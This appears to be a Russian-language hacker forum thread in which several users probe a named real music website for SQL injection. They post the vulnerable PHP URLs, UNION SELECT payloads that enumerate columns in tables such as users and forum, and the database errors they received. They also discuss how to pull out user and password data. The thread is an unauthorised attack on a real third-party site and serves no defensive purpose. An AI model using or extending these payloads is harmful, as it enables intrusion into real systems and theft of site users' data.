|
www.nashe.ru (SQL)
http://www.nashe.ru/data/past/past_detail.php3?id=1'
http://www.nashe.ru/data/artists/art_detail.php3?id=1' ну и там их куча еще.......... вообще че-нить можно замутить с этим? |
Тута скуль инъекция
http://www.nashe.ru/data/past/past_d...1,12,13,null-- но, кажись, ниче не выдет. Ругается типа: UNION types "text" and "int4" not matched . А так - раскрытие пути. Там просто postgeSQL, а с ним я не дружу;))) |
мне кажется надо просто грамотно запрос составить и тогда все будет!
|
Составь, тока мне привычнее иметь дело с MySQL или MSSQL, на крайний случай.
|
эх, ребятки.. находил я уже это.. и таблицы подбирал))
ток толку не было..) там даже для форума нет базы юзеров). |
To Rebz Какую ты конструкцию использовал? А тож интересно, как там построить синтаксически правильную конструкцию.
|
ща поищу.. ток мои запросы обычные.. =) не аткие уж идеальные -)
подобрал атрибуты _http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20 null,null,null,null,null,null,null%20from%20clubs-- _http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20 null,null,null,null,null,null,null%20from%20users-- полносью подобраны атрибуты: _http://www.nashe.ru/data/dj/dj_detail.php3?id=34%20union%20select%20 null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null, null,null%20from%20users-- select users,null - дает интересную ошибку.. атрибут users Кажется сущестуют такие названия как usr_id,usr_name таблица forum есть.. В общем, это всё что удалось раскопать.. да и уже неитнересно стало) |
ссылки которые я привел с SQl на сайте, если правильно составить запрос то что в итоге должно примерно выдавать?
|
ошибку MySQL должно выдать..
если ты подберешь названия столбцов (атрибутов) и самих таблиц, то можно полезные вещи вытащить.. если бы базы паролей были там..) можно было их бы вытащить) |
Цитата:
|
| Время: 20:09 |